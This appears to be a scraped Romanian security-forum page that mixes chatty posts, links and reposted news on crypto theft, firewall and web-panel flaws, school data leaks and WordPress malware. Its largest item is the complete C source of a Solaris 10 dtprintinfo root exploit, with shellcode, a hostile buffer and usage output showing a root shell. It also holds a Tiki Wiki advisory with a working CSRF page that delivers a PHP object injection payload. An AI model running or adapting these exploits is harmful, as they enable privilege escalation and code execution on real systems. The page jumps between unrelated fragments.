Kev

Salut, il mai are cineva? http://www.javascriptkit.com/howto/externalhtml.shtml P.S. il voiam pe cel al lui Neme

Tally.Work is an AI cover letter generator that creates a cover letter from your resume and a job description in seconds. It's intuitive, saves you time and works great as a starting point. URL: https://tally.work Via Google

North Korea-linked hackers stole $1.7bn of cryptocurrency in 2022 North Korea-backed hackers stole $1.7bn (£1.4bn) of crypto in 2022, says blockchain analysis firm Chainalysis. This nearly quadruples the country's previous record for cryptocurrency theft - $429m in 2021. The loot also made up 44% of the $3.8bn stolen in crypto hacks last year, which the firm called "the biggest year ever for crypto hacking". Experts have said the country, facing heavy sanctions, is turning to crypto theft to fund its nuclear arsenal. North Korea has conducted six nuclear tests and analysts expect the seventh one this year, as the country accelerates its nuclear weapons programme under leader Kim Jong-un. Last year, Pyongyang launched a record number of ballistic and other missiles. This is despite the country's struggling economy. These hackers typically launder crypto through "mixers", which blend cryptocurrencies from various users to obfuscate the origins of the funds, the firm said. Other experts have also said that North Korea launders stolen crypto through brokers in China and non-fungible tokens (NFTs). Last month, the FBI confirmed that North Korea-affiliated Lazarus Group was responsible for a $100m crypto heist on a blockchain network called Horizon bridge last year. Overall, decentralised finance protocols, or DeFi, accounted for over 82% of cryptocurrency stolen in 2022, Chainalysis' report said. DeFi users know what will happen to their funds when they use them because smart contract codes governing these protocols are publicly accessible by default. But this transparency also makes DeFi particularly attractive to hackers, who can scan the codes for vulnerabilities and "strike at the perfect time" to maximise their loot, according to the report. David Schwed, chief operating officer at blockchain security firm Halborn, noted that DeFi developers "prioritise growth over all else", and funds that could be used to enhance security are often directed instead to rewards, in order to attract users. DeFi developers can take a leaf from traditional financial institutions in making their platforms more secure, Mr Schwed said. For instance, they can simulate different hacking scenarios to test their protocols, or design mechanisms to pause or halt transactions when suspicious activity is detected. "You don't need to move as slow as a bank, but you can borrow from what banks do," he said. Via bbc.com

Link: https://mac.lc gãsit pe bing.com

Monzo, Monese, d/astea de 2 lei... instant inclusv Transivlavia Revolut....

Edit: hackerii nu furã.

Iar incepem? Track1,2,3--- Cu grija, mai bine intrebi cum nu-ti fura

Solaris 10 CDE local privilege escalation exploit that achieves root by injecting a fake printer via lpstat and uses a buffer overflow in libXM ParseColors(). /* * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info> * * "What has been will be again, * what has been done will be done again; * there is nothing new under the Sun." * -- Ecclesiastes 1:9 * * #Solaris #CDE #0day #ForeverDay #WontFix * * This exploit illustrates yet another way to abuse the infamous dtprintinfo * binary distributed with the Common Desktop Environment (CDE), a veritable * treasure trove for bug hunters since the 1990s. It's not the most reliable * exploit I've ever written, but I'm quite proud of the new vulnerabilities * I've unearthed in dtprintinfo with the latest Solaris patches (CPU January * 2021) applied. The exploit chain is structured as follows: * 1. Inject a fake printer via the printer injection bug I found in lpstat. * 2. Exploit the stack-based buffer overflow I found in libXm ParseColors(). * 3. Enjoy root privileges! * * For additional details on my bug hunting journey and on the vulnerabilities * themselves, you can refer to the official advisory: * https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt * * Usage: * $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall * $ ./raptor_dtprintlibXmas 10.0.0.109:0 * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info> * * Using SI_PLATFORM : i86pc (5.10) * Using stack base : 0x8047fff * Using safe address : 0x8045790 * Using rwx_mem address : 0xfeffa004 * Using sc address : 0x8047fb4 * Using sprintf() address : 0xfefd1250 * Path of target binary : /usr/dt/bin/dtprintinfo * * On your X11 server: * 1. Select the "fnord" printer, then click on "Selected" > "Properties". * 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu. * * Back to your original shell: * # id * uid=0(root) gid=1(other) * * IMPORTANT NOTE. * The buffer overflow corrupts some critical variables in memory, which we * need to fix. In order to do so, we must patch the hostile buffer at some * fixed locations with the first argument of the last call to ParseColors(). * The easiest way to get such a safe address is via the special 0x41414141 * command-line argument and truss, as follows: * $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 10.0.0.109:0 0x41414141 2>OUT * $ grep ParseColors OUT | tail -1 * 29181/1@1: -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724) * ^^^^^^^^^ << this is the safe address we need * * Tested on: * SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021) * [previous Solaris versions are also likely vulnerable] */ #include <fcntl.h> #include <link.h> #include <procfs.h> #include <stdio.h> #include <stdlib.h> #include <strings.h> #include <unistd.h> #include <sys/stat.h> #include <sys/systeminfo.h> #define INFO1 "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE" #define INFO2 "Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>" #define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program #define DEBUG "/tmp/XXXXXXXXXXXXXXXXXX" // target for debugging #define BUFSIZE 1106 // size of hostile buffer #define PADDING 1 // hostile buffer padding #define SAFE 0x08045770 // 1st arg to ParseColors() char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) */ /* triple setuid() */ "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" /* execve() */ "\x31\xc0\x50\x68/ksh\x68/bin" "\x89\xe3\x50\x53\x89\xe2\x50" "\x52\x53\xb0\x3b\x50\xcd\x91"; /* globals */ char *arg[2] = {"foo", NULL}; char *env[256]; int env_pos = 0, env_len = 0; /* prototypes */ int add_env(char *string); void check_bad(int addr, char *name); int get_env_addr(char *path, char **argv); int search_ldso(char *sym); int search_rwx_mem(void); void set_val(char *buf, int pos, int val); /* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], cmd[1024], *vuln = VULN; char platform[256], release[256], display[256]; int i, sc_addr, safe_addr = SAFE; FILE *fp; int sb = ((int)argv[0] | 0xfff); // stack base int ret = search_ldso("sprintf"); // sprintf() in ld.so.1 int rwx_mem = search_rwx_mem(); // rwx memory /* helper that prints argv[0] address, used by get_env_addr() */ if (!strcmp(argv[0], arg[0])) { printf("0x%p\n", argv[0]); exit(0); } /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* process command line */ if ((argc < 2) || (argc > 3)) { fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n", argv[0]); exit(1); } snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]); if (argc > 2) { safe_addr = (int)strtoul(argv[2], (char **)NULL, 0); } /* enter debug mode */ if (safe_addr == 0x41414141) { unlink(DEBUG); snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG); if (system(cmd) == -1) { perror("error creating debug binary"); exit(1); } vuln = DEBUG; } /* fill envp while keeping padding */ add_env("LPDEST=fnord"); // injected printer add_env("HOME=/tmp"); // home directory add_env("PATH=/usr/bin:/bin"); // path sc_addr = add_env(display); // x11 display add_env(sc); // shellcode add_env(NULL); /* calculate shellcode address */ sc_addr += get_env_addr(vuln, argv); /* inject a fake printer */ unlink("/tmp/.printers"); unlink("/tmp/.printers.new"); if (!(fp = fopen("/tmp/.printers", "w"))) { perror("error injecting a fake printer"); exit(1); } fprintf(fp, "fnord :\n"); fclose(fp); link("/tmp/.printers", "/tmp/.printers.new"); /* craft the hostile buffer */ bzero(buf, sizeof(buf)); for (i = PADDING; i < BUFSIZE - 16; i += 4) { set_val(buf, i, ret); // sprintf() set_val(buf, i += 4, rwx_mem); // saved eip set_val(buf, i += 4, rwx_mem); // 1st arg set_val(buf, i += 4, sc_addr); // 2nd arg } memcpy(buf, "\"c c ", 5); // beginning of hostile buffer buf[912] = ' '; // string separator set_val(buf, 1037, safe_addr); // safe address set_val(buf, 1065, safe_addr); // safe address set_val(buf, 1073, 0xffffffff); // -1 /* create the hostile XPM icon files */ system("rm -fr /tmp/.dt"); mkdir("/tmp/.dt", 0755); mkdir("/tmp/.dt/icons", 0755); if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) { perror("error creating XPM icon files"); exit(1); } fprintf(fp, "/* XPM */\nstatic char *xpm[] = {\n\"8 8 3 1\",\n%s", buf); fclose(fp); link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm"); link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm"); /* print some output */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr); fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret); fprintf(stderr, "Path of target binary\t: %s\n\n", vuln); /* check for badchars */ check_bad(safe_addr, "safe address"); check_bad(rwx_mem, "rwx_mem address"); check_bad(sc_addr, "sc address"); check_bad(ret, "sprintf() address"); /* run the vulnerable program */ execve(vuln, arg, env); perror("execve"); exit(0); } /* * add_env(): add a variable to envp and pad if needed */ int add_env(char *string) { int i; /* null termination */ if (!string) { env[env_pos] = NULL; return env_len; } /* add the variable to envp */ env[env_pos] = string; env_len += strlen(string) + 1; env_pos++; /* pad envp using zeroes */ if ((strlen(string) + 1) % 4) for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { env[env_pos] = string + strlen(string); env_len++; } return env_len; } /* * check_bad(): check an address for the presence of badchars */ void check_bad(int addr, char *name) { int i, bad[] = {0x00, 0x09, 0x20}; // NUL, HT, SP for (i = 0; i < sizeof(bad) / sizeof(int); i++) { if (((addr & 0xff) == bad[i]) || ((addr & 0xff00) == bad[i]) || ((addr & 0xff0000) == bad[i]) || ((addr & 0xff000000) == bad[i])) { fprintf(stderr, "error: %s contains a badchar\n", name); exit(1); } } } /* * get_env_addr(): get environment address using a helper program */ int get_env_addr(char *path, char **argv) { char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; char hex[11]; int fd[2], addr; /* truncate program name at correct length and create a hard link */ prog[strlen(path)] = '\0'; unlink(prog); link(argv[0], prog); /* open pipe to read program output */ if (pipe(fd) == -1) { perror("pipe"); exit(1); } switch(fork()) { case -1: /* cannot fork */ perror("fork"); exit(1); case 0: /* child */ dup2(fd[1], 1); close(fd[0]); close(fd[1]); execve(prog, arg, env); perror("execve"); exit(1); default: /* parent */ close(fd[1]); read(fd[0], hex, sizeof(hex)); break; } /* check address */ if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) { fprintf(stderr, "error: cannot read address from helper\n"); exit(1); } return addr + strlen(arg[0]) + 1; } /* * search_ldso(): search for a symbol inside ld.so.1 */ int search_ldso(char *sym) { int addr; void *handle; Link_map *lm; /* open the executable object file */ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { perror("dlopen"); exit(1); } /* get dynamic load information */ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { perror("dlinfo"); exit(1); } /* search for the address of the symbol */ if ((addr = (int)dlsym(handle, sym)) == NULL) { fprintf(stderr, "sorry, function %s() not found\n", sym); exit(1); } /* close the executable object file */ dlclose(handle); return addr; } /* * search_rwx_mem(): search for an RWX memory segment valid for all * programs (typically, /usr/lib/ld.so.1) using the proc filesystem */ int search_rwx_mem(void) { int fd; char tmp[16]; prmap_t map; int addr = 0, addr_old; /* open the proc filesystem */ sprintf(tmp,"/proc/%d/map", (int)getpid()); if ((fd = open(tmp, O_RDONLY)) < 0) { fprintf(stderr, "can't open %s\n", tmp); exit(1); } /* search for the last RWX memory segment before stack (last - 1) */ while (read(fd, &map, sizeof(map))) if (map.pr_vaddr) if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { addr_old = addr; addr = map.pr_vaddr; } close(fd); /* add 4 to the exact address NUL bytes */ if (!(addr_old & 0xff)) addr_old |= 0x04; if (!(addr_old & 0xff00)) addr_old |= 0x0400; return addr_old; } /* * set_val(): copy a dword inside a buffer (little endian) */ void set_val(char *buf, int pos, int val) { buf[pos] = (val & 0x000000ff); buf[pos + 1] = (val & 0x0000ff00) >> 8; buf[pos + 2] = (val & 0x00ff0000) >> 16; buf[pos + 3] = (val & 0xff000000) >> 24; } Source

Exploiting vulnerability with 9.8 severity rating isn't particularly hard. More than 4,400 Internet-exposed servers are running versions of the Sophos Firewall that’s vulnerable to a critical exploit that allows hackers to execute malicious code, a researcher has warned. CVE-2022-3236 is a code-injection vulnerability allowing remote code execution in the User Portal and Webadmin of Sophos Firewalls. It carries a severity rating of 9.8 out of 10. When Sophos disclosed the vulnerability last September, the company warned it had been exploited in the wild as a zero-day. The security company urged customers to install a hotfix and, later on, a full-blown patch to prevent infection. According to recently published research, more than 4,400 servers running the Sophos firewall remain vulnerable. That accounts for about 6 percent of all Sophos firewalls, security firm VulnCheck said, citing figures from a search on Shodan. The researcher said he was able to create a working exploit for the vulnerability based on technical descriptions in this advisory from the Zero Day Initiative. The research's implicit warning: Should exploit code become public, there’s no shortage of servers that could be infected. Baines urged Sophos firewall users to ensure they’re patched. He also advised users of vulnerable servers to check for two indicators of possible compromise. The first is the log file located at: /logs/csc.log, and the second is /log/validationError.log. When either contains the_discriminator field in a login request, there likely was an attempt, successful or otherwise, to exploit the vulnerability, he said. The silver lining in the research is that mass exploitation isn’t likely because of a CAPTCHA that must be completed during authentication by web clients. In a statement, Sophos officials wrote: "Sophos took immediate steps to remediate this issue with an automated hotfix sent out in September 2022. We also alerted users who don't receive automatic hotfixes to apply the update themselves. The remaining 6% of the Internet-facing versions that Baines is guestimating in his article are running old, unsupported version of the software. This is a good opportunity to remind these users, as well as all users of any type of outdated software, to follow best security practices and upgrade to the most recent version available, like Sophos does on a regular basis with its customers." Via arstechnica.com

RecoverPy RecoverPy is a powerful tool that leverages your system capabilities to recover lost files. Unlike others, you can not only recover deleted files but also overwritten data. Every block of your partition will be scanned. You can even find a string in binary files. Demo Installation RecoverPy is currently only available on Linux systems. Dependancies Mandatory: To list and search through your partitions, recoverpy uses grep, dd, and lsblk commands. Although, if you're running a major Linux distrucition these tools should already be installed. Optional: To display real time grep progress, you can install progress. To install all dependencies: Debian-like: apt install grep coreutils util-linux progress Arch: pacman -S grep coreutils util-linux progress Fedora: dnf install grep coreutils util-linux progress Installation from pip python3 -m pip install recoverpy Usage python3 -m recoverpy You must be root or use sudo. Select the system partition in which your file was. If you are out of luck, you can alternatively search in your home partition, maybe your IDE, text editor, etc. made a backup at some point. Type a text string to search. See tips below for better results. Start search, Results will appear in the left-hand box. Select a result. Once you have found your precious, select Open. You can now either save this block individually or explore neighboring blocks for the remaining parts of the file. You could then save it all in one file. Tips Always do backups! Yes, maybe too late... Unmount your partition before you do anything! Although you can search with your partition still mounted, it is highly recommended to unmount your partition to avoid any alteration to your file. Regarding the searched string: Be concise, find something that could be unique to your file. Stay simple, your string is escaped but exotic characters may affect your results. Try to remember the last edit you have made to your file. When you have found your file: You might see multiple results. Your system often use different partion blocks to save successive versions of a file. Make sure you've found the last version. Try exploring neighboring blocks to be sure to save your whole file. Contributing Thank you for considering contributing to RecoverPy. Any request, bug report or PR are welcome. Please read the contributing guide. Download: RecoverPy-main.zip or git clone https://github.com/PabloLec/RecoverPy.git Source: github.com

A patch was released in October, but not all servers have installed it. Malicious hackers have begun exploiting a critical vulnerability in unpatched versions of the Control Web Panel, a widely used interface for web hosting. “This is an unauthenticated RCE,” members of the Shadowserver group wrote on Twitter, using the abbreviation for remote code exploit. “Exploitation is trivial and a PoC published.” PoC refers to a proof-of-concept code that exploits the vulnerability. The vulnerability is tracked as CVE-2022-44877. It was discovered by Numan Türle of Gais Cyber Security and patched in October in version 0.9.8.1147. Advisories didn’t go public until earlier this month, however, making it likely some users still aren’t aware of the threat. Figures provided by Security firm GreyNoise show that attacks began on January 7 and have slowly ticked up since then, with the most recent round continuing through Wednesday. The company said the exploits are coming from four separate IP addresses located in the US, Netherlands, and Thailand. Shadowserver shows that there are roughly 38,000 IP addresses running Control Web Panel, with the highest concentration in Europe, followed by North America and Asia. The severity rating for CVE-2022-44877 is 9.8 out of a possible 10. “Bash commands can be run because double quotes are used to log incorrect entries to the system,” the advisory for the vulnerability stated. As a result, unauthenticated hackers can execute malicious commands during the login process. The following video demonstrates the flow of the exploit. Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877 The vulnerability resides in the /login/index.php component and resulted from CWP using a faulty structure when logging incorrect entries, according to the Daily Swig. The structure is: echo "incorrect entry, IP address, HTTP_REQUEST_URI" >> /blabla/wrong.log. “Since the request URI comes from the user, and as you can see it is within double quotes, it is possible to run commands such as $(blabla), which is a bash feature,” Türle told the publication. Given the ease and severity of exploitation and the availability of working exploit code, organizations using Control Web Panel should ensure they’re running version 0.9.8.1147 or higher. Via arstechnica.com

https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-january-2023 Succes! Credit: Jessica Haworth

Link :https://www.fly.faa.gov/adv/advADB.jsp Via Google

Mesaj catre ISP Eu: ISP: Eu: ISP: Scuze pentru dublu post, am zis ca nu apare notificare pentru edit

Url: https://www.compart.com/en/unicode/ Enjoy! P.S. Gasit pe google

LogLog-Beta and More: A New Algorithm for Cardinality Estimation Based on LogLog Counting - by Jason Qin, Denys Kim, Yumei Tung TL;DR: Better than HyperLogLog in approximating the number unique elements in a set LogLog-Beta LogLog-Beta is a new algorithm for estimating cardinalities based on LogLog counting. The new algorithm uses only one formula and needs no additional bias corrections for the entire range of cardinalities, therefore, it is more efficient and simpler to implement. The simulations show that the accuracy provided by the new algorithm is as good as or better than the accuracy provided by either of HyperLogLog or HyperLogLog++. Example const std = @import("std"); const HyperLogLog = @import("zig-hyperloglog").DefaultHyperLogLog; const RndGen = std.rand.DefaultPrng; var rnd = RndGen.init(0); pub fn main() !void { const count = 1e7; const alloc = std.heap.page_allocator; var hll = try HyperLogLog().init(alloc); defer hll.deinit(); var i: u64 = 0; while (i < count) : (i += 1) { const x = rnd.random().int(u64); try hll.add_hashed(x); } const est = hll.cardinality(); std.debug.print("Estimated cardinality: {d}\n", .{est}); } Source: github.com

Highly confidential documents from 14 schools have been leaked online by hackers, the BBC can reveal. Following a hack, Vice Society makes demands for money to prevent it leaking documents on the dark web One of those was Pates Grammar School in Gloucestershire, targeted by a hacking group called Vice Society. The documents, seen by the BBC, include children's SEN information, child passport scans, staff pay scales and contract details, taken in 2021 & 2022. A spokesperson for Pates Grammar School said it took the security of its systems and data extremely seriously. The Vice Society has been behind a high-profile string of attacks on schools across the UK and the USA in recent months. It allegedly stole 500 gigabytes of data from the entire Los Angeles Unified School District, according to technology website Wired. The FBI in America has already released an alert on the group's activities. When data is stolen, Vice Society makes demands for money before leaking the documents if payment is not made. The Vice Society's website contained thousands of documents hacked from schools The documents stolen from Pates Grammar School were comprehensive, with hackers taking documents using generic search terms. One folder marked "passports" contains passport scans for pupils and parents on school trips going back to 2011, whereas another marked "contract" contains contractual offers made to staff alongside teaching documents on muscle contractions. Another folder marked "confidential" contains documents on the headmaster's pay, and student bursary fund recipients. Alongside information from Pates, the BBC found confidential documents purporting to be from the following establishments on Vice Society's website. Every school on this list has been contacted for comment. Carmel College, St Helens Durham Johnston Comprehensive School (hacked in 2021, documents posted online in January 2022) Frances King School of English, London/Dublin Frances King said it hadn't notified parents and pupils, but the hack didn't affect teaching and it was reported to their IT company. Gateway College, Hamilton, Leicester Holy Family RC + CE College, Heywood Lampton School, Hounslow, London Lampton School issued a statement that read: "Teachers were aware of the breach but we did not inform them of the data that was stolen. The ICO did not tell us to notify the data subjects. We blocked remote access to all but a small number of staff with two-factor authentication, and all our passwords have been reset." Mossbourne Federation, London Mossbourne Federation said: "Parents, pupils, staff and all concerned were immediately notified and kept up-to-date during the recovery process. We have fully recovered from the cyber-attack and have returned to normal operations." Pilton Community College, Barnstaple Samuel Ryder Academy, St Albans School of Oriental and African Studies, London St Paul's Catholic College, Sunbury-on-Thames Test Valley School, Stockbridge The De Montfort School, Evesham The De Montfort School declined to comment. The School of Oriental and African Studies confirmed it was hacked in September 2022, with staff contracts and budget details leaked among some 18,680 other files. "We notified staff and students of the incident, and while we were able to prevent the incident escalating, it resulted in a small, limited data breach of files on internal storage. "The individuals affected have been contacted, and we are continuing to offer support as required," a spokesperson said. Hackers leaked the information on the dark web, a section of the internet often used by criminals. The dark web is not indexed on regular search engines, and requires specialist browsing software to access it. Pates Grammar School was one of those hacked by Vice Society Pates' hacking timeline The hack at Pates is estimated to have taken place on 28 September, when the school emailed parents to say its IT systems and phone lines were down. A few days later the school emailed again with Gmail accounts it had created for parents to contact. On 7 October, the headteacher emailed again to say its systems were "accessed by an unauthorised third party." Teaching materials, which relied on Microsoft Teams, were affected, and the school said it had notified the Information Commissioners Office (ICO) and police. At that time, the headmaster wrote: "There is currently no evidence that data has been stolen or published." Five days later, the school emailed parents again. The headmaster wrote: "Regrettably, it now appears that some of our data was taken by the criminal organisation and placed on its dark web site, which is not easily accessible and only available to a limited audience with the technical knowledge and ability to access this specific site. "If we learn that any significant data has been affected in this way, you will be informed and provided with guidance and assistance." The ICO and Gloucestershire Police confirmed they were investigating the alleged breaches in 2022. A spokesperson for Pates Grammar School said: "We are currently working closely with cyber-security specialists to conduct a thorough assessment and analysis of this data. "We are working with highly experienced forensic investigators to secure our systems and resolve the issue. "We have successfully restored key systems, minimised the disruption to staff and students, and continue to keep the relevant authorities informed of any new developments." Ross Brewer, chief revenue officer of cyber-security risk management company SimSpace, said: 'We see the education and healthcare sectors being heavily targeted due to their primary focus being on education and care, not cybersecurity. "They are typically under resourced in the IT function and are easy prey for the hackers that have no heart and are purely motivated by greed. "The personal information that can be obtained is highly valuable or in some cases embarrassing. Organisations need to train their teams in the safe cyber range environment, so they know what to look for, how to identify gaps in their protection, and how to continually improve their digital hygiene." Via bbc.com

Tiki Wiki CMS Groupware versions 24.1 and below suffer from a PHP object injection vulnerability in tikiimporter_blog_wordpress.php. ---------------------------------------------------------------------------------------------------- Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP Object Injection Vulnerability ---------------------------------------------------------------------------------------------------- [-] Software Link: https://tiki.org [-] Affected Versions: Version 24.1 and prior versions. [-] Vulnerability Description: The vulnerability is located in the /lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when importing data from WordPress sites through the Tiki Importer, user input passed through the uploaded XML file is being used in a call to the unserialize() PHP function. This can be exploited by malicious users to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. Successful exploitation of this vulnerability requires an admin account (specifically, the ‘tiki_p_admin_importer’ permission). However, due to the CSRF vulnerability described in KIS-2023-01, this vulnerability might also be exploited by tricking a victim user into opening a web page like the following: <html> <form action="http://localhost/tiki/tiki-importer.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="importerClassName" value="TikiImporter_Blog_Wordpress" /> <input type="hidden" name="importAttachments" value="on" /> <input type="file" name="importFile" id="fileinput"/> </form> <script> const xmlContent = atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAw ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg=="); const fileInput = document.getElementById("fileinput"); const dataTransfer = new DataTransfer(); const file = new File([xmlContent], "test.xml", {type: "text/xml"}); dataTransfer.items.add(file); fileInput.files = dataTransfer.files; document.forms[0].submit(); </script> </html> [-] Solution: Upgrade to version 24.2 or later. [-] Disclosure Timeline: [07/03/2022] - Vendor notified [23/08/2022] - Version 24.1 released [09/01/2023] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-22851 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2023-04 Source

insereaza email subscribe, sa nu intrii in probleme cu spam-ul

am completat tot

Customers of US bank Silvergate, which provides cryptocurrency services, have withdrawn over $8bn (£6.7bn) of their crypto-linked deposits. Around two-thirds of the bank's customers pulled their deposits in the final three months of 2022. The bank has sold $5.2bn in assets to cover the cost and remain liquid. It came as three US regulators warned banks that issuing or holding crypto was "highly likely to be inconsistent with safe and sound banking practices". Silvergate is a bank listed on the New York Stock Exchange, and is therefore regulated within the financial sector. It is one of a small handful of businesses within this sector that provides cryptocurrency services. The withdrawals followed the collapse of the FTX crypto exchange, which was once valued at $32bn before its bankruptcy filing in November. Former FTX boss Sam Bankman-Fried has pleaded not guilty to charges that he defrauded customers and investors. Prosecutors say as many as one million creditors may have lost their money. The case has shaken the entire crypto industry, sparking bankruptcy filings at other firms and declines in crypto values. Alan Lane, chief executive of Silvergate, said the bank was selling assets to cover the withdrawals by customers "in response to the rapid changes in the digital asset industry". Silvergate is the latest victim of the chilling "crypto winter" that's been whipping through the industry since last spring. The so-called crypto bank occupied a fairly unique position in the market acting as a bank for cryptocurrency companies which struggled to get banking services from traditional sources. One of its customers was the now bankrupt Alameda Research - owned by Sam Bankman-Fried who awaits trial in the US accused of fraud. That in itself is a blow for Silvergate but Bankman-Fried's downfall has delivered a bigger blow to the company - market confidence. Since Bankman-Fried's empire collapsed, investors large and small have been pulling their money out of crypto companies with billions transferred from companies that store crypto funds. So far the biggest companies in the space like Binance and Coinbase have survived the unprecedented withdrawals and it appears as though Silvergate is weathering the storm too for now but at a huge cost to its balance sheet. Silvergate was a small US bank before it entered the world of cryptocurrency, and went public in November 2019. At the market's peak in 2021, its shares had grown by more than 1,500%, in no small part due to the massive growth of crypto in this period. During this time it tried to launch its own stablecoin - a form of cryptocurrency which is directly tied to an asset such as gold, the US dollar or other cryptocurrencies. And in January 2022, Silvergate spent $182m to acquire the technology behind Meta's proposed Diem (formerly Libra) stablecoin that never saw the light of day. In a filing to the US Securities and Exchange Commission, the bank said it had sold debt to cover the withdrawals and had written off the Diem purchase, meaning it is no longer counted as an asset. It has also reduced its staff by 40% - around 200 people - and altogether the withdrawals have caused the bank to lose $718m, a total higher than its profit since 2013. Via bbc.com

System Recruitment?

Link: https://urlscan.io/search/#domain%3A"google.com" Credit: urlscan GmbH

People who use WordPress should check their sites for unpatched plugins. Malware that exploits unpatched vulnerabilities in 30 different WordPress plugins has infected hundreds if not thousands of sites and may have been in active use for years, according to a writeup published last week. The Linux-based malware installs a backdoor that causes infected sites to redirect visitors to malicious sites, researchers from security firm Dr.Web said. It’s also able to disable event logging, go into standby mode, and shut itself down. It gets installed by exploiting already-patched vulnerabilities in plugins that website owners use to add functionality like live chat or metrics-reporting to the core WordPress content management system. Searches such as this one indicate that more than 1,300 sites contain the JavaScript that powers the backdoor. It’s possible that some of those sites have removed the malicious code since the last scan. Still, it provides an indication of the reach of the malware. The plugins exploited include: WP Live Chat Support Plugin WordPress – Yuzo Related Posts Yellow Pencil Visual Theme Customizer Plugin Easysmtp WP GDPR Compliance Plugin Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972) Thim Core Google Code Inserter Total Donations Plugin Post Custom 